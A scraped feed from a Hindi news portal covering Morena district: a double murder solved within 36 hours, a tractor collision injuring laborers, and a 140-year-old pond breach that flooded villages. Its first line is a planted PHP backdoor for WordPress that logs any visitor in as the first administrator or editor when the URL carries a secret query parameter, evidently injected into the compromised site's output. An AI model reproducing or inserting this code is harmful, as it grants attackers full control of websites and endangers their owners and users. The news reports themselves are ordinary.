// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Morena – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 29 May 2025 10:06:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 मुरैना में डबल मर्डर कांड का खुलासा, पुलिस ने 36 घंटे के अंदर आरोपी गिरफ्तार, हत्या कारण आया सामने https://pratyushaashakinayikiran.com/?p=159935 Thu, 29 May 2025 10:06:00 +0000 https://pratyushaashakinayikiran.com/?p=159935 मुरैना
 सिहोनिया डबल मर्डर मामले में पुलिस ने 36 घंटे के अंदर दोनों आरोपी को गिरफ्तार कर लिया है. पुलिस ने आरोपियों के कब्जे से दो कट्टे और जिंदा-मुर्दा राउंड भी बरामद किए हैं. आरोपी की पहचान पोरसा निवासी वीरू (उर्फ वीरपाल शुक्ला) और गोविंदा खटीक के रूप में हुई है. वहीं, वारदात के बाद एसपी ने सिहोनियां थाना प्रभारी को लाइन हाजिर कर दिया.

आरोपी की तलाश में जुटी थी सात टीमें

मुरैना एसपी समीर सौरभ ने कहा, "दो दिन पहले जिले के सिहोनियां थाना क्षेत्र में स्विफ्ट में सवार होकर आए दो बदमाशों ने चाचा और भतीजे की गोली मारकर हत्या कर दी थी. मृतक की पहचान महेंद्र उर्फ बंटी भदौरिया और सौरभ भदौरिया के रुप में हुई थी. घटना के बाद आरोपियों को पकड़ने के लिए डीएसपी हैडक्वार्टर विजय भदौरिया तथा अम्बाह एसडीओपी रवि प्रकाश भदौरिया के नेतृत्व में 7 टीमें लगाई गई थीं."

आरोपी के कब्जे से हथियार बरामद

पुलिस अधिकारी के अनुसार, दोनों आरोपी पेट्रोल-डीजल बेचने का धंधा करते थे. वारदात को अंजाम देने के बाद दोनों आरोपी स्विफ्ट कार को घर के करीब एक गैरेज में छिपाकर फरार हो गए. ऐसे में एक पुलिस टीम आरोपी के घर के बाहर तैनात कर दी गई. मुखबिर द्वारा सूचना मिली कि आरोपी सांगोली तिराहे के पास घूम रहे हैं. पुलिस टीम मौके पर पहुंच कर दोनों को गिरफ्तार कर लिया. हत्या में प्रयुक्त हथियारों को भी बरामद कर लिया है, जिसमें दो कट्टे और जिंदा-मुर्दा राउंड शामिल हैं.

पुलिस पूछताछ में आरोपियों ने बताया कि, ''वे दोनों पहले शराब का धंधा करते थे. लेकिन, कुछ महीनों से शराब का धंधा बंद कर पेट्रोल-डीजल बेचने का काम शुरू कर दिया था. यूपी से डीजल लेकर आसपास के ग्रामीण क्षेत्रों में सप्लाई करते थे. घटना वाले दिन दोनों बगैर नंबर प्लेट स्विफ्ट कार से डीजल की खेप लेकर जा रहे थे. इसी दौरान भाईखां क्षेत्र में सामने से आ रहे मृतक चाचा और भतीजे को देखकर आरोपियों को खुद पर हमले का शक हुआ. उन्होंने कार रोकर हड़बड़ी में कट्टे से दोनों पर गोली चला दी. जिसमें दोनों की मौके पर ही मौत हो गई थी.''

]]>
मुरैना में दो ट्रैक्टरों की भिड़ंत में एक दर्जन से लोग घायल, कई को आई गंभीर चोट https://pratyushaashakinayikiran.com/?p=118108 Mon, 06 Jan 2025 15:25:00 +0000 https://pratyushaashakinayikiran.com/?p=118108 मुरैना।

मध्य प्रदेश के मुरैना जिले के पोरसा कस्बे से धोरोंठा गांव के पास ईंटों से भरे ट्रैक्टर की मिट्टी से भरे ट्रैक्टर से आमने-सामने भिड़ंत हो गई। हादसे में ईंटों से भरा ट्रैक्टर पलट गया, जिससे उसमें बैठे एक दर्जन मजदूरों सहित दोनों ट्रैक्टर के चालक गंभीर रूप से घायल हो गए।

घटना की जानकारी मिलते ही आसपास के ग्रामीण मौके पर पहुंचे और घायलों को एंबुलेंस के माध्यम से पोरसा अस्पताल भिजवाया। वहीं, दोनों ट्रैक्टर चालकों के परिजन भी मौके पर पहुंचे और उन्हें इलाज के लिए निजी अस्पताल में ले गए। इस दुर्घटना में ईंटों से भरी ट्रॉली पलट गई, जिसे जेसीबी की मदद से सीधा किया गया। हादसे में घायल मजदूरों में सूरज पुत्र भागीरथ बाल्मीकि (20), राहुल पुत्र भागीरथ बाल्मीकि (26), संजू पुत्र रामनिवास जाटव (26) और रामू पुत्र महेश बाल्मीकि (22) समेत अन्य लोग शामिल हैं। इनका उपचार पोरसा के सामुदायिक स्वास्थ्य केंद्र में चल रहा है। इसके अलावा, मिट्टी से भरे ट्रैक्टर का चालक सोनू और ईंटों से भरे ट्रैक्टर का अज्ञात चालक भी घायल हुए हैं। सूचना मिली है कि दोनों निजी क्लिनिक में अपना उपचार करा रहे हैं। हालांकि, इस सड़क दुर्घटना में अब तक किसी जनहानि की सूचना नहीं मिली है। पुलिस मामले की जांच कर रही है।

]]>
मुरैना के सबलगढ़ में 140 साल पुराना तालाब फूटा… खाली कराए गए गांव, सतर्कता से खतरा टला https://pratyushaashakinayikiran.com/?p=60401 Wed, 14 Aug 2024 16:08:00 +0000 https://pratyushaashakinayikiran.com/?p=60401  ​​​​​मुरैना

दो साल पहले धार जिले के कारम बांध की तरह मुरैना में भी तालाब फूटने से सैलाब आ गया। मुरैना की सबलगढ़ तहसील से तीन किमी दूर स्थित टोंगा पंचायत का पुराना तालाब मंगलवार की सुबह फूट गया। जिससे तेज गति से पानी गांवों की ओर बढ़ने लगा।

हालांकि सोमवार की शाम को ही तालाब में हल्की दरार की सूचना के बाद प्रशासन अलर्ट हो गया था। प्रशासन की सतर्कता से बड़ा खतरा टाला जा सका। अधिकारियों ने आधा दर्जन गांव खाली कराने के साथ ही नहर तोडवा कर पानी का बहाव आसन नदी की ओर करा दिया था। इससे गांवों को कुछ ही देर में राहत मिल गई।

आज भी नही मिलेगी राहत

जानकारी के मुताबिक मुरैना में भारी बारिश के कारण टोंगा तालाब की एक तरफ की पार टूट गई, जिसके कारण पानी तेज बहाव के साथ खेतों में जा घुसा। इससे किसानों को भारी नुकसान हुआ है। आज यानी मंगलवार को भी मौसम विभाग ने मुरैना सहित आठ जिलों में भारी बारिश के कारण ऑरेंज अलर्ट जारी किया है। यानी अभी भी मुरैना के किसानों की आफत कम नहीं हुई है।

इन गावों में पानी ही पानी

जानकारी के मुताबिक विशेष रूप से 4 गांव जिसमें कुतघान का पुरा, कौरी का पुरा, पंचमुखी हनुमान मंदिर का एरिया और पासौन गांव में ज्यादा तदाद में पानी भर गया। सबलगढ़ विधायक सरला रावत, एसडीएम वीरेंद्र कटारे, सबलगढ़ थाना प्रभारी सोहनपाल तोमर पुलिस बल के साथ मौके पर पहुंच चुके हैं। खबर लिखने तक कोई जनहानि की सूचना नहीं है।

 टोंगा तालाब फूटने की सूचना शाम को मिल गई थी। रात से ही यहां अधिकारी-कर्मचारी लगे हुए थे, जिससे तालाब फूटने के बावजूद कोई अप्रिय घटना या नुकसान नहीं हुआ।- अंकित अस्थाना, कलेक्टर।

टोंगा पंचायत में 140 साल पुराने तालाब की क्षमता 1.93 एमसीएम (मिलियन क्यूबिक मीटर) है, जो 80 प्रतिशत भर गया था। इससे वहां के 20 गांवों की सिंचाई की जाती है। सोमवार की शाम को तालाब में दो फीट की दरार आ गई, जिसके बाद आस पास के आधा दर्जन गांवों को रात में खाली करा दिया गया था।

मंगलवार सुबह छह बजे तालाब की दरार 15 फीट चौड़ी हो गई। जिससे तेजी से तालाब का पानी गांवों में घुसने लगा। मौके पर पहुंचे कलेक्टर अंकित अस्थाना, एसडीएम वीरेंद्र कटारे व जल संसाधन विभाग के अधिकारी डटे रहे।

सोमवार शाम 4 बजे दरार दिखी, रात 8 बजे पानी गांव में घुस आया

टोंगा गांव के लोगों का कहना है कि सोमवार शाम 4 बजे एक युवक बांध की ओर गया तो 15 इंच की दरार दिखी। तुरंत सिंचाई विभाग, जिला प्रशासन और पुलिस को सूचना दी गई। कलेक्टर अंकित अस्थाना, सिंचाई विभाग से इंजीनियर और पुलिस अधिकारियों को लेकर मौके पर पहुंचे।

दरार देखी लेकिन इसे ठीक करने के प्रयास शुरू नहीं किए गए। कैचमेंट एरिया में पड़ने वाले 20 गांवों में अलर्ट जरूर कर दिया कि डैम से रिसाव हो रहा है। पानी का बहाव तेज हो सकता है। इस लापरवाही से यह हुआ कि रात 8 बजे पानी गांव में घुस आया।

जब तक पूरा पानी नहीं निकलता, दरार की मरम्मत नहीं हो सकती

मंगलवार को जब भास्कर की टीम पहुंची तो बांध की दरार फूटकर 20 फीट की हो चुकी थी। पानी का बहाव इतना तेज था कि हमारे सामने ही एक मोटी दीवार ढहकर बह गई। पूरे गांव में पानी भरा था और लोग घरों से बाहर डरे-सहमे बैठे थे।

उनका कहना था कि जब तक पूरा पानी नहीं निकल जाता, दरार की मरम्मत नहीं हो सकती। लेकिन ऐसा होने पर गांव में पानी का संकट आ जाएगा।

सबसे ज्यादा टोंगा, देवपुर गांव के हालात खराब; लोग सड़कों पर

टोंगा रिजर्व डैम की दीवार में दरार और उसके फूट जाने के बाद सबलगढ़ के 20 गांवों में हालात खराब हो गए हैं। सबसे ज्यादा खराब स्थिति टोंगा, देवपुर, कुतघान का पुरा, कोरी का पुरा, पासौन, रानी का पुरा गांव में है। यहां खेतों-घरों में पानी भर गया है। पोल टूटने से बिजली भी गुल है।

रानी का पुरा की सायरा बानो उर्फ मुमताज, पति और दो बच्चों के साथ सबलगढ़ की 6 नंबर पुलिया के पास सड़क पर रह रही हैं।

 

]]>